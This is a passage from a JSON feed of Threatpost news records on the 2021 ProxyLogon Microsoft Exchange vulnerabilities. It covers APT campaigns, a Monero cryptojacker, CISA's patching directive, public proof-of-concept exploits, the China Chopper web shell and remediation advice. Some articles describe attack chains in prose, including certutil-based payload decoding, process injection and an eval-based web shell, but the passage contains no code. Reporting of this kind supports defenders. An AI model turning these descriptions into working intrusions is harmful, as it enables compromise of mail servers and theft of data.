highly similar to previous Winnti v.4 malware loaders\u2026used to decrypt an encrypted payload from disk and execute it. Additionally, we observed various Mimikatz and password dumping tools.\u201d\n\nAfter the patches rolled out and the vulnerabilities were publicly disclosed, [CactusPete (a.k.a. Tonto Team)](<https://threatpost.com/cactuspete-apt-toolset-respionage-targets/158350/>) compromised the email servers of an Eastern Europe-based procurement company and a cybersecurity consulting company, ESET noted. The attacks resulted in the ShadowPad loader being implanted, along with a variant of the Bisonal remote-access trojan (RAT).\n\nAnd, the Mikroceen APT group (a.k.a. 
Vicious Panda) compromised the Exchange server of a utility company in Central Asia, which is the region it mainly targets, a day after the patches were released.\n\n## **Unattributed Exploitation Activity**\n\nA cluster of pre-patch activity that ESET dubbed Websiic was also seen targeting seven email servers belonging to private companies (in the domains of IT, telecommunications and engineering) in Asia and a governmental body in Eastern Europe.\n\nESET also said it has seen a spate of unattributed [ShadowPad activity](<https://threatpost.com/ccleaner-attackers-intended-to-deploy-keylogger-in-third-stage/130358/>) resulting in the compromise of email servers at a software development company based in East Asia and a real estate company based in the Middle East. ShadowPad is a cyber-attack platform that criminals deploy in networks to gain remote control capabilities, keylogging functionality and data exfiltration.\n\nAnd, it saw another cluster of activity targeting around 650 servers, mostly in Germany and other European countries, the U.K. and the United States. All of the latter attacks featured a first-stage webshell called RedirSuiteServerProxy, researchers said.\n\nAnd finally, on four email servers located in Asia and South America, webshells were used to install IIS backdoors after the patches came out, researchers said.\n\nThe groundswell of activity, particularly on the zero-day front, brings up the question of how knowledge of the vulnerabilities was spread between threat groups.\n\n\u201cOur ongoing research shows that not only Hafnium has been using the recent RCE vulnerability in Exchange, but that multiple APTs have access to the exploit, and some even did so prior to the patch release,\u201d ESET concluded. 
\u201cIt is still unclear how the distribution of the exploit happened, but it is inevitable that more and more threat actors, including ransomware operators, will have access to it sooner or later.\u201d\n\nOrganizations with on-premise Microsoft Exchange servers should patch as soon as possible, researchers noted \u2013 if it\u2019s not already too late.\n\n\u201cThe best mitigation advice for network defenders is to apply the relevant patches,\u201d said Joe Slowik, senior security researcher with DomainTools, in a [Wednesday post](<https://www.domaintools.com/resources/blog/examining-exchange-exploitation-and-its-lessons-for-defenders>). \u201cHowever, given the speed in which adversaries weaponized these vulnerabilities and the extensive period of time pre-disclosure when these were actively exploited, many organizations will likely need to shift into response and remediation activities \u2014 including attack surface reduction and active threat hunting \u2014 to counter existing intrusions.\u201d\n", "cvss3": {}, "published": "2021-03-11T18:01:16", "type": "threatpost", "title": "Microsoft Exchange Servers Face APT Attack Tsunami", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-11T18:01:16", "id": "THREATPOST:CAA77BB0CF0093962ECDD09004546CA3", "href": 
"https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-04-15T12:28:24", "description": "Cryptojacking can be added to the list of threats that face any [unpatched Exchange servers](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) that remain vulnerable to the now-infamous ProxyLogon exploit, new research has found.\n\nResearchers discovered threat actors using Exchange servers that had been compromised via the highly publicized exploit chain\u2014which suffered a [barrage of attacks](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) from advanced persistent threat (APT) groups to infect systems with everything from [ransomware](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>) to webshells\u2014to host Monero cryptomining malware, according to [a report](<https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/>) posted online this week by SophosLabs.\n\n\u201cAn unknown attacker has been attempting to leverage what\u2019s now known as the ProxyLogon exploit to foist a malicious Monero cryptominer onto Exchange servers, with the payload being hosted on a compromised Exchange server,\u201d Sophos principal researcher Andrew Brandt wrote in the report.\n\nResearchers were inspecting telemetry when they discovered what they deemed an \u201cunusual attack\u201d targeting the customer\u2019s Exchange server. Sophos researchers Fraser Howard and Simon Porter were instrumental in the discovery and analysis of the novel threat, Brandt acknowledged.\n\nResearchers said they detected the executables associated with this attack as Mal/Inject-GV and XMR-Stak Miner (PUA), according to the report. 
Researchers published a list of [indicators of compromise](<https://github.com/sophoslabs/IoCs/blob/master/PUA-QuickCPU_xmr-stak.csv>) on the SophosLabs GitHub page to help organizations recognize if they\u2019ve been attacked in this way.\n\n## **How It Works**\n\nThe attack as observed by researchers began with a PowerShell command to retrieve a file named win_r.zip from another compromised server\u2019s Outlook Web Access logon path (/owa/auth), according to the report. Under closer inspection, the .zip file was not a compressed archive at all but a batch script that then invoked the built-into-Windows certutil.exe program to download two additional files, win_s.zip and win_d.zip, which also were not compressed.\n\nThe first file is written out to the filesystem as QuickCPU.b64, an executable payload in base64 that can be decoded by the certutil application, which by design can decode base64-encoded security certificates, researchers observed.\n\nThe batch script then runs another command that outputs the decoded executable into the same directory. Once decoded, the batch script runs the executable, which extracts the miner and configuration data from the QuickCPU.dat file, injects it into a system process, and then deletes any evidence that it was there, according to the report.\n\nThe executable in the attack appears to contain a modified version of a tool publicly available on Github called PEx64-Injector, which is [described](<https://github.com/0xyg3n/PEx64-Injector>) on its Github page as having the ability to \u201cmigrate any x64 exe to any x64 process\u201d with \u201cno administrator privileges required,\u201d according to the report.\n\nOnce the file runs on an infected system, it extracts the contents of the QuickCPU.dat file, which includes an installer for the cryptominer and its configuration temporarily to the filesystem. It then configures the miner, injects it into a running process, then quits, according to the report. 
\u201cThe batch file then deletes the evidence and the miner remains running in memory, injected into a process already running on the system,\u201d Brandt wrote.\n\nResearchers observed the cryptominer receiving funds on March 9, which is when Microsoft also released updates to Exchange to patch the flaws. Though the attacker lost several servers after this date and the output from the miner decreased, other servers that were gained thereafter more than made up for the early losses, according to the report.\n\n## **Exploit-Chain History**\n\nThe ProxyLogon problem started for Microsoft in early March when the company said it [had spotted multiple zero-day exploits](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in the wild being used to attack on-premises versions of Microsoft Exchange Server. The exploit chain comprises four flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065).\n\nTogether the flaws created a pre-authentication remote code execution (RCE) exploit, meaning attackers can take over servers without knowing any valid account credentials. This gave them access to email communications and the opportunity to install a web shell for further exploitation within the environment.\n\nAs previously mentioned, Microsoft released an out-of-band update [soon after](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in its scramble to patch the flaws in the ProxyLogon chain; however, while the company boasted later that month that 92 percent of affected machines already had been patched, much damage had already been done, and unpatched systems likely exist that remain vulnerable.\n", "cvss3": {}, "published": "2021-04-15T12:19:13", "type": "threatpost", "title": "Attackers Target ProxyLogon Exploit to Install Cryptojacker", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-04-15T12:19:13", "id": "THREATPOST:B787E57D67AB2F76B899BCC525FF6870", "href": "https://threatpost.com/attackers-target-proxylogon-cryptojacker/165418/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-04T21:57:55", "description": "Hot on the heels of Microsoft\u2019s announcement about active cyber-espionage campaigns that are [exploiting four serious security vulnerabilities](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in Microsoft Exchange Server, the U.S. 
government is mandating patching for the issues.\n\nThe news comes as security firms report escalating numbers of related campaigns led by sophisticated adversaries against a range of high-value targets, especially in the U.S.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has issued an emergency directive, warning that its partners have observed active exploitation of the bugs in Microsoft Exchange on-premises products, which allow attackers to have \u201cpersistent system access and control of an enterprise network.\u201d\n\n\u201cCISA has determined that this exploitation of Microsoft Exchange on-premises products poses an unacceptable risk to Federal Civilian Executive Branch agencies and requires emergency action,\u201d reads the [March 3 alert](<https://cyber.dhs.gov/ed/21-02/>). \u201cThis determination is based on the current exploitation of these vulnerabilities in the wild, the likelihood of the vulnerabilities being exploited, the prevalence of the affected software in the federal enterprise, the high potential for a compromise of agency information systems and the potential impact of a successful compromise.\u201d\n\n## **Rapidly Spreading Exchange Server Attacks**\n\nEarlier this week Microsoft said that it had spotted multiple zero-day exploits in the wild being used to attack on-premises versions of Microsoft Exchange Server, spurring it to release [out-of-band patches](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>).\n\nThe exploited bugs are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065. When chained together, they allow remote authentication bypass and remote code execution. 
Adversaries have been able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access, according to the computing giant.\n\nThe attacks are being carried out in part by a China-linked advanced persistent threat (APT) called Hafnium, Microsoft said \u2013 but multiple other security firms have observed attacks from other groups and against a widespread swathe of targets.\n\nHuntress Labs, for instance, told Threatpost that its researchers have discovered more than 200 web shells deployed across thousands of vulnerable servers (with antivirus and endpoint detection/recovery installed), and it expects this number to keep rising.\n\n\u201cThe team is seeing organizations of all shapes and sizes affected, including electricity companies, local/county governments, healthcare providers and banks/financial institutions, as well as small hotels, multiple senior citizen communities and other mid-market businesses,\u201d a spokesperson at Huntress told Threatpost.\n\nMeanwhile, researchers at ESET tweeted that CVE-2021-26855 was being actively exploited in the wild by at least three APTs besides Hafnium.\n\n\u201cAmong them, we identified #LuckyMouse, #Tick, #Calypso and a few additional yet-unclassified clusters,\u201d it tweeted, adding that while most attacks are against targets in the U.S., \u201cwe\u2019ve seen attacks against servers in Europe, Asia and the Middle East.\u201d\n\n> Most targets are located in the US but we\u2019ve seen attacks against servers in Europe, Asia and the Middle East. Targeted verticals include governments, law firms, private companies and medical facilities. 
3/5 [pic.twitter.com/kwxjYPeMlm](<https://t.co/kwxjYPeMlm>)\n> \n> \u2014 ESET research (@ESETresearch) [March 2, 2021](<https://twitter.com/ESETresearch/status/1366862951156695047?ref_src=twsrc%5Etfw>)\n\nThe vulnerabilities only exist in on-premise versions of Exchange Server, and don\u2019t affect Office 365 and virtual instances. Yet despite the move to the cloud, there are plenty of physical servers still in service, leaving a wide pool of targets.\n\n\u201cWith organizations migrating to Microsoft Office 365 en masse over the last few years, it\u2019s easy to forget that on-premises Exchange servers are still in service,\u201d Saryu Nayyar, CEO, Gurucul, said via email. \u201cSome organizations, notably in government, can\u2019t migrate their applications to the cloud due to policy or regulation, which means we will see on-premises servers for some time to come.\u201d\n\n## **CISA Mandates Patching Exchange Servers**\n\nCISA is requiring federal agencies to take several steps in light of the spreading attacks.\n\nFirst, they should take a thorough inventory of all on-premises Microsoft Exchange Servers in their environments, and then perform forensics to identify any existing compromises. Any compromises must be reported to CISA for remediation.\n\nThe forensics step would include collecting \u201csystem memory, system web logs, windows event logs and all registry hives. Agencies shall then examine the artifacts for indications of compromise or anomalous behavior, such as credential dumping and other activities.\u201d\n\nIf no indicators of compromise have been found, agencies must immediately patch, CISA added. 
And if agencies can\u2019t immediately patch, then they must take their Microsoft Exchange Servers offline.\n\nAll agencies have also been told to submit an initial report by Friday on their current situation.\n\n\u201c[This] highlights the increasing frequency of attacks orchestrated by nation states,\u201d said Steve Forbes, government cybersecurity expert at Nominet, via email. \u201cThe increasing role of government agencies in leading a coordinated response against attacks. CISA\u2019s directive for agencies to report back on their level of exposure, apply security fixes or disconnect the program is the latest in a series of increasingly regular emergency directives that the agency has issued since it was established two years ago. Vulnerabilities like these demonstrate the necessity for these coordinated national protective measures to efficiently and effectively mitigate the effects of attacks that could have major national security implications.\u201d\n", "cvss3": {}, "published": "2021-03-04T17:08:36", "type": "threatpost", "title": "CISA Orders Fed Agencies to Patch Exchange Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-04T17:08:36", "id": "THREATPOST:54430D004FBAE464FB7480BC724DBCC8", "href": "https://threatpost.com/cisa-federal-agencies-patch-exchange-servers/164499/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-03-16T17:23:15", "description": "As dangerous attacks accelerate against Microsoft Exchange Servers in the wake of the disclosure around the [ProxyLogon group of security bugs](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>), a public proof-of-concept (PoC) whirlwind has started up. 
It\u2019s all leading to a feeding frenzy of cyber-activity.\n\nThe good news, however, is that Microsoft has issued a one-click mitigation and remediation tool in light of the ongoing swells of attacks.\n\nResearchers said that while advanced persistent threats (APTs) were the first to the game when it comes to hacking vulnerable Exchange servers, the public PoCs mean that the cat is officially out of the bag, meaning that less sophisticated cybercriminals can start to leverage the opportunity.\n\n\u201cAPTs\u2026can reverse engineer the patches and make their own PoCs,\u201d Roger Grimes, data-driven defense evangelist at KnowBe4, told Threatpost. \u201cBut publicly posted PoCs mean that the thousands of other hacker groups that don\u2019t have that level of sophistication can do it, and even those groups that do have that sophistication can do it faster.\u201d\n\nAfter confirming the efficacy of one of the new public PoCs, security researcher Will Dormann of CERT/CC [tweeted](<https://twitter.com/wdormann/status/1370800181143351296>), \u201cHow did I find this exploit? Hanging out in the dark web? A hacker forum? No. Google search.\u201d\n\n## **What is the ProxyLogon Exploit Against Microsoft Exchange?**\n\nMicrosoft said in early March that it [had spotted multiple zero-day exploits](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in the wild being used to attack on-premises versions of Microsoft Exchange servers.\n\nFour flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. 
This gives them access to email communications and the opportunity to install a web shell for further exploitation within the environment.\n\nAnd indeed, Microsoft noted that adversaries from a Chinese APT called Hafnium were able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access.\n\nMicrosoft quickly pushed out out-of-band patches for ProxyLogon, but even so, tens of thousands of organizations have so far been compromised using the exploit chain.\n\nIt\u2019s also apparent that Hafnium isn\u2019t the only party of interest, according to multiple researchers; [ESET said last week](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) that at least 10 different APTs are using the exploit.\n\nThe sheer volume of APTs mounting attacks, most of them starting in the days before ProxyLogon became publicly known, has prompted questions as to the exploit\u2019s provenance \u2013 and ESET researchers mused whether it was shared around the Dark Web on a wide scale.\n\nSeveral versions of the on-premise flavor of Exchange are vulnerable to the four bugs, including Exchange 2013, 2016 and 2019. Cloud-based and hosted versions are not vulnerable to ProxyLogon.\n\n## **How Many Organizations and Which Ones Remain at Risk?**\n\nMicrosoft originally identified more than 400,000 on-premise Exchange servers that were at-risk when the patches were first released on March 2. Data collected by RiskIQ [indicated that](<https://www.riskiq.com/blog/external-threat-management/microsoft-exchange-server-landscape/?utm_campaign=exchange_landscape_blog>) as of March 14, there were 69,548 Exchange servers that were still vulnerable. 
And in a separate analysis from Kryptos Logic, 62,018 servers are still vulnerable to CVE-2021-26855, the server-side request forgery flaw that allows initial access to Exchange servers.\n\n\u201cWe released one additional set of updates on March 11, and with this, we have released updates covering more than 95 percent of all versions exposed on the internet,\u201d according to a [post](<https://www.microsoft.com/security/blog/2021/03/12/protecting-on-premises-exchange-servers-against-recent-attacks/>) published by Microsoft last week.\n\nHowever, Check Point Research (CPR) [said this week](<https://blog.checkpoint.com/2021/03/11/exploits-on-organizations-worldwide/>) that in its latest observations on exploitation attempts, the number of attempted attacks has increased tenfold, from 700 on March 11 to more than 7,200 on March 15.\n\nAccording to CPR\u2019s telemetry, the most-attacked country has been the United States (accounting for 17 percent of all exploit attempts), followed by Germany (6 percent), the United Kingdom (5 percent), the Netherlands (5 percent) and Russia (4 percent).\n\nThe most-targeted industry sector meanwhile has been government/military (23 percent of all exploit attempts), followed by manufacturing (15 percent), banking and financial services (14 percent), software vendors (7 percent) and healthcare (6 percent).\n\n\u201cWhile the numbers are falling, they\u2019re not falling fast enough,\u201d RiskIQ said in its [post](<https://www.riskiq.com/blog/external-threat-management/microsoft-exchange-server-landscape/?utm_campaign=exchange_landscape_blog&utm_source=twitter&utm_medium=social&utm_content=exchange_landscape_blog_twitter>). \u201cIf you have an Exchange server unpatched and exposed to the internet, your organization is likely already breached. 
One reason the response may be so slow is many organizations may not realize they have exchange servers exposed to the Internet\u2014this is a common issue we see with new customers.\u201d\n\nIt added, \u201cAnother is that while new patches are coming out every day, many of these servers are not patchable and require upgrades, which is a complicated fix and will likely spur many organizations to migrate to cloud email.\u201d\n\n## **Will the ProxyLogon Attacks Get Worse?**\n\nUnfortunately, it\u2019s likely that attacks on Exchange servers will become more voluminous. Last week, independent security researcher Nguyen Jang [published a PoC on GitHub, ](<https://twitter.com/taviso/status/1370068702817783810>)which chained two of the [ProxyLogon](<https://securityaffairs.co/wordpress/115428/security/microsoft-exchange-emergency-update.html>) vulnerabilities together.\n\nGitHub quickly took it down in light of the hundreds of thousands of still-vulnerable machines in use, but it was still available for several hours.\n\nThen over the weekend, another PoC appeared, flagged and confirmed by CERT/CC\u2019s Dormann:\n\n> Well, I'll say that the ProxyLogon Exchange CVE-2021-26855 Exploit is completely out of the bag by now.<https://t.co/ubsysTeFOj> \nI'm not so sure about the \"Failed to write to shell\" error message. But I can confirm that it did indeed drop a shell on my test Exchange 2016 box. [pic.twitter.com/ijOGx3BIif](<https://t.co/ijOGx3BIif>)\n> \n> \u2014 Will Dormann (@wdormann) [March 13, 2021](<https://twitter.com/wdormann/status/1370800181143351296?ref_src=twsrc%5Etfw>)\n\nEarlier, Praetorian researchers on March 8 published a [detailed technical analysis](<https://www.praetorian.com/blog/reproducing-proxylogon-exploit/>) of CVE-2021-26855 (the one used for initial access), which it used to create an exploit. 
The technical details offer a public roadmap for reverse-engineering the patch.\n\nThe original exploit used by APTs meanwhile could have been leaked or lifted from Microsoft\u2019s information-sharing program, according to a recent report in the Wall Street Journal. [In light of evidence](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) that multiple APTs were mounting zero-day attacks in the days before Microsoft released patches for the bugs, the computing giant is reportedly questioning whether an exploit was leaked from one of its security partners.\n\nThat program, the Microsoft Active Protections Program (MAPP), delivers relevant bug information to security vendors ahead of disclosure, so they can get a jump on adding signatures and indicators of compromise to their products and services. This can include, yes, exploit code.\n\n\u201cSome of the tools used in the second wave of the attack, which is believed to have begun Feb. 28, bear similarities to proof-of-concept attack code that Microsoft distributed to antivirus companies and other security partners Feb. 23, investigators at security companies say,\u201d according to [the report](<https://www.wsj.com/articles/microsoft-probing-whether-leak-played-role-in-suspected-chinese-hack-11615575793>). \u201cMicrosoft had planned to release its security fixes two weeks later, on March 9, but after the second wave began it pushed out the patches a week early, on March 2, according to researchers.\u201d\n\n## **Microsoft Mitigation Tool**\n\nMicrosoft has released an Exchange On-premises Mitigation Tool (EOMT) to help smaller businesses without dedicated security teams to protect themselves.\n\n\u201cMicrosoft has released a new, [one-click mitigation tool](<https://aka.ms/eomt>), Microsoft Exchange On-Premises Mitigation Tool to help customers who do not have dedicated security or IT teams to apply these security updates. 
We have tested this tool across Exchange Server 2013, 2016, and 2019 deployments,\u201d according to a [post](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>) published by Microsoft. \u201cThis new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update.\u201d\n\nMicrosoft said that the tool will mitigate against exploits for the initial-access bug CVE-2021-26855 via a URL rewrite configuration, and will also scan the server using the [Microsoft Safety Scanner](<https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/safety-scanner-download>) to identify any existing compromises. Then, it will remediate those.\n\n## **China Chopper Back on the Workbench**\n\nAmid this flurry of activity, more is becoming known about how the attacks work. For instance, Hafnium, the APT first flagged by Microsoft, is uploading the well-known China Chopper web shell to victim machines.\n\nThat\u2019s according to [an analysis](<https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hafnium-china-chopper-and-aspnet-runtime/>) from Trustwave SpiderLabs, which found that China Chopper is specifically being uploaded to compromised Microsoft Exchange servers with a publicly facing Internet Information Services (IIS) web server.\n\nChina Chopper is an Active Server Page Extended (ASPX) web shell that is typically planted on an IIS or Apache server through an exploit. 
Once established, the backdoor \u2014 which [hasn\u2019t been altered much](<https://threatpost.com/china-chopper-tool-multiple-campaigns/147813/>) since its inception nearly a decade ago \u2014 allows adversaries to execute various commands on the server, drop malware and more.\n\n\u201cWhile the China Chopper web shell has been around for years, we decided to dig even deeper into how the China Chopper web shell works as well as how the ASP.NET runtime serves these web shells,\u201d according to Trustwave. \u201cThe China Chopper server-side ASPX web shell is [extremely small](<https://threatpost.com/fin7-active-exploits-sharepoint/144628/>) and typically, the entire thing is just one line.\u201d\n\nHafnium is using the JScript version of the web shell, researchers added.\n\n\u201cThe script is essentially a page where when an HTTP POST request is made to the page, and the script will call the JScript \u2018eval\u2019 function to execute the string inside a given POST request variable,\u201d researchers explained. \u201cIn the\u2026script, the POST request variable is named \u2018secret,\u2019 meaning any JScript contained in the \u2018secret\u2019 variable will be executed on the server.\u201d\n\nResearchers added that typically, a China Chopper client component in the form of a C binary file is used on the attacker\u2019s systems.\n\n\u201cThis client allows the attacker to perform many nefarious tasks such as downloading and uploading files, running a virtual terminal to execute anything you normally could using cmd.exe, modifying file times, executing custom JScript, file browsing and more,\u201d explained Trustwave researchers. 
\u201cAll this is made available just from the one line of code running on the server.\u201d\n", "cvss3": {}, "published": "2021-03-16T16:56:26", "type": "threatpost", "title": "Exchange Cyberattacks Escalate as Microsoft Rolls One-Click Fix", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-16T16:56:26", "id": "THREATPOST:A4C1190B664DAE144A62459611AC5F4A", "href": "https://threatpost.com/microsoft-exchange-cyberattacks-one-click-fix/164817/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-26T19:00:10", "description": "The patching level for Microsoft Exchange Servers that are vulnerable to the [ProxyLogon group of security bugs](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>) has reached 92 percent, according to Microsoft.\n\nThe computing giant [tweeted out the stat](<https://twitter.com/msftsecresponse/status/1374075310195412992>) earlier this week \u2013 though of course patching won\u2019t fix already-compromised machines. Still, that\u2019s an improvement of 43 percent just since last week, Microsoft pointed out (using telemetry from RiskIQ).\n\n> Our work continues, but we are seeing strong momentum for on-premises Exchange Server updates: \n\u2022 92% of worldwide Exchange IPs are now patched or mitigated. 
\n\u2022 43% improvement worldwide in the last week. [pic.twitter.com/YhgpnMdlOX](<https://t.co/YhgpnMdlOX>)\n> \n> \u2014 Security Response (@msftsecresponse) [March 22, 2021](<https://twitter.com/msftsecresponse/status/1374075310195412992?ref_src=twsrc%5Etfw>)\n\nProxyLogon consists of four flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) that can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. This gives them access to email communications and the opportunity to install a web shell for further exploitation within the environment.\n\nThe good news on patching comes as a whirlwind of ProxyLogon cyberattacks has hit companies across the globe, with multiple advanced persistent threats (APTs) and possibly other adversaries moving quickly to exploit the bug. A spate of public proof-of-concept exploits has added fuel to the fire \u2013 which is blazing so bright that F-Secure said on Sunday that hacks are occurring \u201cfaster than we can count,\u201d with tens of thousands of machines compromised.\n\n\u201cTo make matters worse, proof-of-concept automated attack scripts are being made publicly available, making it possible for even unskilled attackers to quickly gain remote control of a vulnerable Microsoft Exchange Server,\u201d according to [F-Secure\u2019s writeup](<https://blog.f-secure.com/microsoft-exchange-proxylogon/>). \u201cThere is even a fully functioning package for exploiting the vulnerability chain published to the Metasploit application, which is commonly used for both hacking- and security testing. 
This free-for-all attack opportunity is now being exploited by vast numbers of criminal gangs, state-backed threat actors and opportunistic script kiddies.\u201d\n\nThe attackers are using ProxyLogon to carry out a range of attacks, including data theft and the installation of malware, such as the recently discovered \u201cBlackKingdom\u201d strain. According to Sophos, the ransomware operators are asking for $10,000 in Bitcoin in exchange for an encryption key.\n\n## **Patching Remains Tough for Many**\n\nThe CyberNews investigation team [found](<https://cybernews.com/news/patched-microsoft-exchange-servers-give-a-false-sense-of-security-says-cisas-brandon-wales/>) 62,174 potentially vulnerable unpatched Microsoft Exchange Servers around the world, as of Wednesday.\n\n_Image: potentially vulnerable unpatched Microsoft Exchange Servers around the world. Source: CyberNews._\n\nVictor Wieczorek, practice director for Threat & Attack Simulation at GuidePoint Security, noted that some organizations are not structured or resourced to patch effectively against ProxyLogon.\n\n\u201cThis is because, 1) a lack of accurate asset inventory and ownership information; and 2) lag time to vet patching for negative impacts on the business and gain approval from asset/business owners to patch,\u201d he told Threatpost. \u201cIf you don\u2019t have an accurate inventory with a high level of confidence, it takes a long time to hunt down affected systems. You have to determine who owns them and if applying the patch would negatively impact the system\u2019s function. 
Responsible and timely patching takes lots of proactive planning and tracking.\u201d\n\nHe added that by regularly testing existing controls (red-teaming), searching for indicators of existing weakness and active threats (threat hunting), and investing/correcting confirmed vulnerabilities (vulnerability management), organizations are going to be in a much better spot to adjust to emerging vulnerabilities and invoke their incident-response capabilities when needed.\n\n## **APT Activity Continues**\n\nMicrosoft said in early March that it [had spotted multiple zero-day exploits](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in the wild being used to attack on-premises versions of Microsoft Exchange servers.\n\nAnd indeed, Microsoft noted that adversaries from a Chinese APT called Hafnium were able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access. It\u2019s also apparent that Hafnium isn\u2019t the only party of interest, according to multiple researchers; [ESET said earlier in March](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) that at least 10 different APTs are using the exploit.\n\nThe sheer volume of APTs mounting attacks, most of them starting in the days before ProxyLogon became publicly known, has prompted questions as to the exploit\u2019s provenance \u2013 and ESET researchers mused whether it was shared around the Dark Web on a wide scale.\n\nThe APTs seem mainly bent on cyberespionage and data theft, researchers said.\n\n\u201cThese breaches could be occurring in the background, completely unnoticed. Only after months or years will it become clear what was stolen,\u201d according to F-Secure. 
\u201cIf an attacker knows what they are doing, the data has most likely already been stolen or is being stolen right now.\u201d\n\nSeveral versions of the on-premises flavor of Exchange are vulnerable to the four bugs, including Exchange 2013, 2016 and 2019. Cloud-based and hosted versions are not vulnerable to ProxyLogon.\n\n## **Patching is Not Enough; Assume Compromise**\n\nUnfortunately, installing the ProxyLogon security patches alone does not guarantee that a server is secure \u2013 an attacker may have breached it before the update was installed.\n\n\u201cPatching is like closing a door. Therefore, 92 percent of the doors have been closed. But the doors were open for a relatively long time and known to all the bad actors,\u201d Oliver Tavakoli, CTO at Vectra, told Threatpost. \u201cIdentifying and remediating already compromised systems will be a lot harder.\u201d\n\nBrandon Wales, the acting director for the Cybersecurity and Infrastructure Security Agency (CISA), said during a webinar this week that \u201cpatching is not sufficient.\u201d\n\n\u201cWe know that multiple adversaries have compromised networks prior to patches being applied,\u201d Wales said during a [Cipher Brief webinar](<https://cybernews.com/news/patched-microsoft-exchange-servers-give-a-false-sense-of-security-says-cisas-brandon-wales/>). He added, \u201cYou should not have a false sense of security. You should fully understand the risk. 
In this case, how to identify whether your system is already compromised, how to remediate it, and whether you should bring in a third party if you are not capable of doing that.\u201d\n\n## **How Businesses Can Protect Against ProxyLogon**\n\nYonatan Amitay, Security Researcher at Vulcan Cyber, told Threatpost that a successful response to mitigate Microsoft Exchange vulnerabilities should consist of the following steps:\n\n * Deploy updates to affected Exchange Servers.\n * Investigate for exploitation or indicators of persistence.\n * Remediate any identified exploitation or persistence and investigate your environment for indicators of lateral movement or further compromise.\n\n\u201cIf for some reason you cannot update your Exchange servers immediately, Microsoft has released instructions for how to mitigate these vulnerabilities through reconfiguration \u2014 here, as they recognize that applying the latest patches to Exchange servers may take time and planning, especially if organizations are not on recent versions and/or associated cumulative and security patches,\u201d he said. \u201cNote that the mitigations suggested are not substitutes for installing the updates.\u201d\n\nMicrosoft also has issued a one-click mitigation and remediation tool for small- and medium-sized businesses in light of the ongoing swells of attacks.\n\nVectra\u2019s Tavakoli noted that the mitigation guides and tools Microsoft has supplied don\u2019t necessarily help post-compromise \u2013 they are intended to provide mitigation in advance of fully patching the Exchange server.\n\n\u201cThe end result of a compromise is reflective of the M.O. 
of each attack group, and that will be far more variable and less amenable to automated cleanup,\u201d he said.\n\nMilan Patel, global head of MSS for BlueVoyant, said that identifying follow-on malicious activity after the bad guys have gotten access to a network requires a good inventory of where data is housed.\n\n\u201cIncident response is a critical reactive tool that will help address what data could have been touched or stolen by the bad guys after they gained access to the critical systems,\u201d he told Threatpost. \u201cThis is critical, this could mean the difference between a small cleanup effort vs. potential litigation because sensitive data was stolen from the network.\u201d\n", "cvss3": {}, "published": "2021-03-24T18:39:26", "type": "threatpost", "title": "Microsoft Exchange Servers See ProxyLogon Patching Frenzy", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-24T18:39:26", "id": "THREATPOST:BADA213290027D414693E838771F8645", "href": "https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-05-11T06:29:15", "description": "The Lemon Duck cryptocurrency-mining botnet has added the [ProxyLogon group of 